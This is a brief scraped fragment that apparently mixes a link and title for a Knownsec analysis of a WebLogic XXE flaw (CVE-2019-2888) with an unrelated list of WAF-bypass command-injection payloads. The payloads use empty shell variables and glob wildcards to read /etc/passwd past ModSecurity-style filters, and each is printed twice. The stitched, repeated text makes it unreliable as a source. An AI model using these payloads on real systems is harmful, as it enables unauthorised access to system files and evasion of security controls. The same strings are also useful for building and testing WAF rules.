https://blog.knownsec.com/2019/10/weblogic-ejbtaglibdescriptor-xxe%e6%bc%8f%e6%b4%9ecve-2019-2888%e5%88%86%e6%9e%90/
WebLogic XXE in EJBTaglibDescriptor (CVE-2019-2888)
(translate)
WebLogic XXE in EJBTaglibDescriptor (CVE-2019-2888)
(translate)
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?